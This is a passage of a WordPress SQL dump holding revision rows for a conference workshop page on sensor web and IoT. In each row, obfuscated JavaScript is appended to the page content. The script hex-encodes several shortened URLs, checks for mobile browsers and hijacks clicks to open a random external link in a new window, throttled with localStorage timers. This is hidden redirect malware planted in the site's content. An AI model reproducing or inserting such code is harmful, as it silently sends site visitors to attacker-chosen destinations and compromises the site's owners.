ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:15:15','2022-12-06 05:15:15','',3386,'https://gsw2023.com/?p=3415',0,'revision','',0),
(3416,1,'2022-12-06 05:15:30','2022-12-06 05:15:30','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"10x8\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:15:30','2022-12-06 05:15:30','',3386,'https://gsw2023.com/?p=3416',0,'revision','',0),
(3417,1,'2022-12-06 05:15:55','2022-12-06 05:15:55','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"12x10\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 